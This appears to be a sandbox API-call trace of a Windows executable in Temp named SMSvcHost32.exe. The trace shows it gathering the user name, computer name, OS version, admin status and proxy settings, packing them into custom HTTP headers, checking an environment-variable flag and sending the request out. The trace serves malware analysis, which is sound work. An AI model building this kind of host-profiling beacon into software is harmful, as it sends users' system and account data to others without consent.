	[0110.344] lstrlenW (lpString="X-File-Name: C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe") returned 65
	[0110.345] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-File-Name: C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", dwHeadersLength=0x41, dwModifiers=0x10000000) returned 1
	[0110.345] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x51b17c0, nSize=0x258f2f4 | out: lpNameBuffer="X2VS1CUM\\Nd9E1FYi", nSize=0x258f2f4) returned 0x1
	[0110.345] wsprintfW (in: param_1=0x51e82a0, param_2="X-User-Name: %s" | out: param_1="X-User-Name: X2VS1CUM\\Nd9E1FYi") returned 30
	[0110.345] lstrlenW (lpString="X-User-Name: X2VS1CUM\\Nd9E1FYi") returned 30
	[0110.345] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-User-Name: X2VS1CUM\\Nd9E1FYi", dwHeadersLength=0x1e, dwModifiers=0x10000000) returned 1
	[0110.345] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x258f2fc | out: phkResult=0x258f2fc*=0xa28) returned 0x0
	[0110.345] RegQueryValueExW (in: hKey=0xa28, lpValueName="ProxyServer", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x258f2d4*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x258f2d4*=0x0) returned 0x2
	[0110.345] RegQueryValueExW (in: hKey=0xa28, lpValueName="ProxyOverride", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x258f2d4*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x258f2d4*=0x0) returned 0x2
	[0110.345] RegQueryValueExW (in: hKey=0xa28, lpValueName="AutoConfigURL", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x258f2d4*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x258f2d4*=0x0) returned 0x2
	[0110.345] RegCloseKey (hKey=0xa28) returned 0x0
	[0110.355] GetComputerNameW (in: lpBuffer=0x51b1148, nSize=0x258f438 | out: lpBuffer="X2VS1CUM", nSize=0x258f438) returned 1
	[0110.355] wsprintfW (in: param_1=0x51e82a0, param_2="X-ComputerName: %s" | out: param_1="X-ComputerName: X2VS1CUM") returned 24
	[0110.355] lstrlenW (lpString="X-ComputerName: X2VS1CUM") returned 24
	[0110.355] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-ComputerName: X2VS1CUM", dwHeadersLength=0x18, dwModifiers=0x10000000) returned 1
	[0110.355] GetVersionExW (in: lpVersionInformation=0x258f31c*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x258f31c*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1
	[0110.355] GetLastError () returned 0x0
	[0110.355] GetLastError () returned 0x0
	[0110.355] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.356] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.357] GetLastError () returned 0x0
	[0110.358] GetLastError () returned 0x0
	[0110.358] GetLastError () returned 0x0
	[0110.358] GetLastError () returned 0x0
	[0110.358] GetLastError () returned 0x0
	[0110.358] GetLastError () returned 0x0
	[0110.358] GetLastError () returned 0x0
	[0110.358] GetLastError () returned 0x0
	[0110.358] GetLastError () returned 0x0
	[0110.358] GetLastError () returned 0x0
	[0110.401] GetLastError () returned 0x0
	[0110.402] GetLastError () returned 0x0
	[0110.402] GetLastError () returned 0x0
	[0110.402] GetLastError () returned 0x0
	[0110.402] GetLastError () returned 0x0
	[0110.402] GetLastError () returned 0x0
	[0110.402] GetLastError () returned 0x0
	[0110.402] GetLastError () returned 0x0
	[0110.402] GetLastError () returned 0x0
	[0110.402] GetLastError () returned 0x0
	[0110.402] GetLastError () returned 0x0
	[0110.402] GetLastError () returned 0x0
	[0110.402] GetLastError () returned 0x0
	[0110.402] GetLastError () returned 0x0
	[0110.402] GetLastError () returned 0x0
	[0110.402] GetLastError () returned 0x0
	[0110.402] GetLastError () returned 0x0
	[0110.402] GetLastError () returned 0x0
	[0110.402] GetLastError () returned 0x0
	[0110.402] GetLastError () returned 0x0
	[0110.402] GetLastError () returned 0x0
	[0110.402] GetLastError () returned 0x0
	[0110.402] wsprintfW (in: param_1=0x51e82a0, param_2="X-OSVersion: %d.%d.%d|%s %d.%d|%d|0x%p" | out: param_1="X-OSVersion: 6.2.9200| 0.0|1|0x00000100") returned 39
	[0110.402] lstrlenW (lpString="X-OSVersion: 6.2.9200| 0.0|1|0x00000100") returned 39
	[0110.402] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-OSVersion: 6.2.9200| 0.0|1|0x00000100", dwHeadersLength=0x27, dwModifiers=0x10000000) returned 1
	[0110.402] GetLastError () returned 0x0
	[0110.402] GetLastError () returned 0x0
	[0110.402] GetLastError () returned 0x0
	[0110.402] GetLastError () returned 0x0
	[0110.402] GetLastError () returned 0x0
	[0110.402] GetLastError () returned 0x0
	[0110.402] GetLastError () returned 0x0
	[0110.402] GetLastError () returned 0x0
	[0110.402] GetLastError () returned 0x0
	[0110.402] GetLastError () returned 0x0
	[0110.402] GetLastError () returned 0x0
	[0110.402] GetLastError () returned 0x0
	[0110.402] GetLastError () returned 0x0
	[0110.402] GetLastError () returned 0x0
	[0110.402] GetLastError () returned 0x0
	[0110.402] GetLastError () returned 0x0
	[0110.402] GetLastError () returned 0x0
	[0110.402] GetLastError () returned 0x0
	[0110.402] GetLastError () returned 0x0
	[0110.402] GetLastError () returned 0x0
	[0110.402] GetLastError () returned 0x0
	[0110.402] GetLastError () returned 0x0
	[0110.403] GetLastError () returned 0x0
	[0110.403] GetLastError () returned 0x0
	[0110.403] GetLastError () returned 0x0
	[0110.403] GetLastError () returned 0x0
	[0110.403] GetLastError () returned 0x0
	[0110.403] GetLastError () returned 0x0
	[0110.403] GetLastError () returned 0x0
	[0110.403] GetLastError () returned 0x0
	[0110.403] GetLastError () returned 0x0
	[0110.403] GetLastError () returned 0x0
	[0110.403] GetLastError () returned 0x0
	[0110.403] GetLastError () returned 0x0
	[0110.403] GetLastError () returned 0x0
	[0110.403] GetLastError () returned 0x0
	[0110.403] GetLastError () returned 0x0
	[0110.403] GetLastError () returned 0x0
	[0110.403] GetLastError () returned 0x0
	[0110.403] GetLastError () returned 0x0
	[0110.403] GetLastError () returned 0x0
	[0110.403] GetLastError () returned 0x0
	[0110.403] GetLastError () returned 0x0
	[0110.403] GetLastError () returned 0x0
	[0110.403] GetLastError () returned 0x0
	[0110.403] GetLastError () returned 0x0
	[0110.403] GetLastError () returned 0x0
	[0110.403] GetLastError () returned 0x0
	[0110.403] GetLastError () returned 0x0
	[0110.403] GetLastError () returned 0x0
	[0110.403] GetLastError () returned 0x0
	[0110.403] GetLastError () returned 0x0
	[0110.403] GetLastError () returned 0x0
	[0110.403] GetLastError () returned 0x0
	[0110.403] GetLastError () returned 0x0
	[0110.403] GetLastError () returned 0x0
	[0110.403] GetLastError () returned 0x0
	[0110.403] GetLastError () returned 0x0
	[0110.403] GetLastError () returned 0x0
	[0110.403] GetLastError () returned 0x0
	[0110.403] wsprintfW (in: param_1=0x51e82a0, param_2="X-VendorId: %d" | out: param_1="X-VendorId: 3007") returned 16
	[0110.403] lstrlenW (lpString="X-VendorId: 3007") returned 16
	[0110.403] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-VendorId: 3007", dwHeadersLength=0x10, dwModifiers=0x10000000) returned 1
	[0110.403] GetCurrentProcess () returned 0xffffffff
	[0110.403] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x258f2fc | out: TokenHandle=0x258f2fc*=0xa28) returned 1
	[0110.403] GetTokenInformation (in: TokenHandle=0xa28, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x258f2d8 | out: TokenInformation=0x0, ReturnLength=0x258f2d8) returned 0
	[0110.403] GetLastError () returned 0x7a
	[0110.403] GetTokenInformation (in: TokenHandle=0xa28, TokenInformationClass=0x1, TokenInformation=0x5ac670, TokenInformationLength=0x24, ReturnLength=0x258f2d8 | out: TokenInformation=0x5ac670, ReturnLength=0x258f2d8) returned 1
	[0110.404] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x5ac678*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2e)), Name=0x51c2298, cchName=0x258f2cc, ReferencedDomainName=0x51c1668, cchReferencedDomainName=0x258f2cc, peUse=0x258f2c0 | out: Name="Nd9E1FYi", cchName=0x258f2cc, ReferencedDomainName="X2VS1CUM", cchReferencedDomainName=0x258f2cc, peUse=0x258f2c0) returned 1
	[0110.405] CloseHandle (hObject=0xa28) returned 1
	[0110.405] CloseHandle (hObject=0xffffffff) returned 1
	[0110.405] NetUserGetInfo (in: servername="X2VS1CUM", username="Nd9E1FYi", level=0x3, bufptr=0x258f2fc | out: bufptr=0x578980*(usri3_name="Nd9E1FYi", usri3_password=0x0, usri3_password_age=0x1867720, usri3_priv=0x2, usri3_home_dir="", usri3_comment="", usri3_flags=0x10201, usri3_script_path="", usri3_auth_flags=0x0, usri3_full_name="", usri3_usr_comment="", usri3_parms="", usri3_workstations="", usri3_last_logon=0x5bbf6dd7, usri3_last_logoff=0x0, usri3_acct_expires=0xffffffff, usri3_max_storage=0xffffffff, usri3_units_per_week=0xa8, usri3_logon_hours=0x578a17, usri3_bad_pw_count=0x0, usri3_num_logons=0x34, usri3_logon_server="\\\\*", usri3_country_code=0x1, usri3_code_page=0x4e4, usri3_user_id=0x3e8, usri3_primary_group_id=0x201, usri3_profile="", usri3_home_dir_drive="", usri3_password_expired=0x0)) returned 0x0
	[0110.410] GetLastError () returned 0x0
	[0110.410] GetLastError () returned 0x0
	[0110.410] GetLastError () returned 0x0
	[0110.410] GetLastError () returned 0x0
	[0110.410] GetLastError () returned 0x0
	[0110.410] GetLastError () returned 0x0
	[0110.410] GetLastError () returned 0x0
	[0110.410] GetLastError () returned 0x0
	[0110.410] GetLastError () returned 0x0
	[0110.410] GetLastError () returned 0x0
	[0110.410] GetLastError () returned 0x0
	[0110.410] GetLastError () returned 0x0
	[0110.410] GetLastError () returned 0x0
	[0110.410] GetLastError () returned 0x0
	[0110.410] GetLastError () returned 0x0
	[0110.410] GetLastError () returned 0x0
	[0110.410] GetLastError () returned 0x0
	[0110.411] GetLastError () returned 0x0
	[0110.411] GetLastError () returned 0x0
	[0110.411] GetLastError () returned 0x0
	[0110.411] GetLastError () returned 0x0
	[0110.411] GetLastError () returned 0x0
	[0110.411] GetLastError () returned 0x0
	[0110.411] GetLastError () returned 0x0
	[0110.411] GetLastError () returned 0x0
	[0110.411] GetLastError () returned 0x0
	[0110.411] GetLastError () returned 0x0
	[0110.411] GetLastError () returned 0x0
	[0110.411] GetLastError () returned 0x0
	[0110.411] GetLastError () returned 0x0
	[0110.411] GetLastError () returned 0x0
	[0110.411] GetLastError () returned 0x0
	[0110.411] GetLastError () returned 0x0
	[0110.411] GetLastError () returned 0x0
	[0110.411] GetLastError () returned 0x0
	[0110.411] GetLastError () returned 0x0
	[0110.411] GetLastError () returned 0x0
	[0110.411] GetLastError () returned 0x0
	[0110.411] GetLastError () returned 0x0
	[0110.411] GetLastError () returned 0x0
	[0110.411] GetLastError () returned 0x0
	[0110.411] GetLastError () returned 0x0
	[0110.411] GetLastError () returned 0x0
	[0110.411] GetLastError () returned 0x0
	[0110.411] GetLastError () returned 0x0
	[0110.411] GetLastError () returned 0x0
	[0110.411] GetLastError () returned 0x0
	[0110.411] GetLastError () returned 0x0
	[0110.411] GetLastError () returned 0x0
	[0110.411] GetLastError () returned 0x0
	[0110.411] GetLastError () returned 0x0
	[0110.411] GetLastError () returned 0x0
	[0110.411] GetLastError () returned 0x0
	[0110.411] GetLastError () returned 0x0
	[0110.411] GetLastError () returned 0x0
	[0110.411] GetLastError () returned 0x0
	[0110.411] GetLastError () returned 0x0
	[0110.411] GetLastError () returned 0x0
	[0110.411] GetLastError () returned 0x0
	[0110.411] GetLastError () returned 0x0
	[0110.411] GetLastError () returned 0x0
	[0110.411] GetLastError () returned 0x0
	[0110.411] GetLastError () returned 0x0
	[0110.411] GetLastError () returned 0x0
	[0110.411] GetLastError () returned 0x0
	[0110.411] GetLastError () returned 0x0
	[0110.411] GetLastError () returned 0x0
	[0110.411] GetLastError () returned 0x0
	[0110.411] GetLastError () returned 0x0
	[0110.411] GetLastError () returned 0x0
	[0110.411] GetLastError () returned 0x0
	[0110.412] GetLastError () returned 0x0
	[0110.412] GetLastError () returned 0x0
	[0110.412] GetLastError () returned 0x0
	[0110.412] GetLastError () returned 0x0
	[0110.412] GetLastError () returned 0x0
	[0110.412] GetLastError () returned 0x0
	[0110.412] GetLastError () returned 0x0
	[0110.412] GetLastError () returned 0x0
	[0110.412] GetLastError () returned 0x0
	[0110.412] GetLastError () returned 0x0
	[0110.412] GetLastError () returned 0x0
	[0110.412] GetLastError () returned 0x0
	[0110.412] GetLastError () returned 0x0
	[0110.412] GetLastError () returned 0x0
	[0110.412] GetLastError () returned 0x0
	[0110.412] GetLastError () returned 0x0
	[0110.412] GetLastError () returned 0x0
	[0110.412] GetLastError () returned 0x0
	[0110.412] GetLastError () returned 0x0
	[0110.412] GetLastError () returned 0x0
	[0110.412] GetLastError () returned 0x0
	[0110.412] GetLastError () returned 0x0
	[0110.412] GetLastError () returned 0x0
	[0110.412] GetLastError () returned 0x0
	[0110.412] GetLastError () returned 0x0
	[0110.412] GetLastError () returned 0x0
	[0110.412] GetLastError () returned 0x0
	[0110.412] GetLastError () returned 0x0
	[0110.412] GetLastError () returned 0x0
	[0110.412] GetLastError () returned 0x0
	[0110.412] GetLastError () returned 0x0
	[0110.412] GetLastError () returned 0x0
	[0110.412] GetLastError () returned 0x0
	[0110.412] GetLastError () returned 0x0
	[0110.412] GetLastError () returned 0x0
	[0110.412] GetLastError () returned 0x0
	[0110.412] GetLastError () returned 0x0
	[0110.412] GetLastError () returned 0x0
	[0110.412] GetLastError () returned 0x0
	[0110.412] GetLastError () returned 0x0
	[0110.412] GetLastError () returned 0x0
	[0110.412] GetLastError () returned 0x0
	[0110.412] GetLastError () returned 0x0
	[0110.412] GetLastError () returned 0x0
	[0110.412] GetLastError () returned 0x0
	[0110.412] GetLastError () returned 0x0
	[0110.412] GetLastError () returned 0x0
	[0110.412] GetLastError () returned 0x0
	[0110.412] GetLastError () returned 0x0
	[0110.412] GetLastError () returned 0x0
	[0110.412] GetLastError () returned 0x0
	[0110.412] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.413] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.414] GetLastError () returned 0x0
	[0110.415] GetLastError () returned 0x0
	[0110.415] GetLastError () returned 0x0
	[0110.415] GetLastError () returned 0x0
	[0110.415] GetLastError () returned 0x0
	[0110.415] GetLastError () returned 0x0
	[0110.415] GetLastError () returned 0x0
	[0110.415] GetLastError () returned 0x0
	[0110.415] GetLastError () returned 0x0
	[0110.415] GetLastError () returned 0x0
	[0110.415] GetLastError () returned 0x0
	[0110.415] GetLastError () returned 0x0
	[0110.415] GetLastError () returned 0x0
	[0110.415] GetLastError () returned 0x0
	[0110.415] GetLastError () returned 0x0
	[0110.415] GetLastError () returned 0x0
	[0110.415] GetLastError () returned 0x0
	[0110.415] GetLastError () returned 0x0
	[0110.415] GetLastError () returned 0x0
	[0110.415] GetLastError () returned 0x0
	[0110.415] GetLastError () returned 0x0
	[0110.415] GetLastError () returned 0x0
	[0110.415] GetLastError () returned 0x0
	[0110.415] wsprintfW (in: param_1=0x51e82a0, param_2="X-User-Info: %ws|%ws|0x%p|0x%p|%ws|%ws" | out: param_1="X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\\\*") returned 62
	[0110.415] lstrlenW (lpString="X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\\\*") returned 62
	[0110.415] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\\\*", dwHeadersLength=0x3e, dwModifiers=0x10000000) returned 1
	[0110.415] NetApiBufferFree (Buffer=0x578980) returned 0x0
	[0110.415] GetLastError () returned 0x0
	[0110.415] GetLastError () returned 0x0
	[0110.415] GetLastError () returned 0x0
	[0110.415] GetLastError () returned 0x0
	[0110.415] GetLastError () returned 0x0
	[0110.415] GetLastError () returned 0x0
	[0110.415] GetLastError () returned 0x0
	[0110.415] GetLastError () returned 0x0
	[0110.415] GetLastError () returned 0x0
	[0110.415] GetLastError () returned 0x0
	[0110.415] GetLastError () returned 0x0
	[0110.415] GetLastError () returned 0x0
	[0110.415] GetLastError () returned 0x0
	[0110.415] GetLastError () returned 0x0
	[0110.415] GetLastError () returned 0x0
	[0110.415] GetLastError () returned 0x0
	[0110.415] GetLastError () returned 0x0
	[0110.415] GetLastError () returned 0x0
	[0110.416] GetLastError () returned 0x0
	[0110.416] GetLastError () returned 0x0
	[0110.416] GetLastError () returned 0x0
	[0110.416] GetLastError () returned 0x0
	[0110.416] GetEnvironmentVariableA (in: lpName="crackmeololo", lpBuffer=0x258f1e0, nSize=0x104 | out: lpBuffer="") returned 0x0
	[0110.416] wsprintfW (in: param_1=0x51e82a0, param_2="X-IsTrustedComp: %d" | out: param_1="X-IsTrustedComp: 0") returned 18
	[0110.416] lstrlenW (lpString="X-IsTrustedComp: 0") returned 18
	[0110.416] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-IsTrustedComp: 0", dwHeadersLength=0x12, dwModifiers=0x10000000) returned 1
	[0110.416] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-HTTP-Agent: WININET", dwHeadersLength=0x15, dwModifiers=0x10000000) returned 1
	[0110.416] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-Proxy-Present: FALSE", dwHeadersLength=0x16, dwModifiers=0x10000000) returned 1
	[0110.417] lstrlenW (lpString="X-Proxy-Used: FALSE") returned 19
	[0110.417] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-Proxy-Used: FALSE", dwHeadersLength=0x13, dwModifiers=0x10000000) returned 1
	[0110.417] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x258f300 | out: phkResult=0x258f300*=0xa28) returned 0x0
	[0110.417] RegQueryValueExW (in: hKey=0xa28, lpValueName="AutoDetect", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x258f304*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x258f304*=0x0) returned 0x2
	[0110.417] RegCloseKey (hKey=0xa28) returned 0x0
	[0110.417] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-Proxy-AutoDetect: FALSE", dwHeadersLength=0x19, dwModifiers=0x10000000) returned 1
	[0110.417] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x258fb54, lpdwBufferLength=0x258fb34 | out: lpBuffer=0x258fb54, lpdwBufferLength=0x258fb34) returned 1
	[0110.417] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x258fb54, dwBufferLength=0x4) returned 1
	[0110.417] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0 | out: lpOptional=0x0*) returned 1
	[0110.695] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x258fb5c, lpdwBufferLength=0x258fb60, lpdwIndex=0x0 | out: lpBuffer=0x258fb5c*, lpdwBufferLength=0x258fb60*=0x4, lpdwIndex=0x0) returned 1
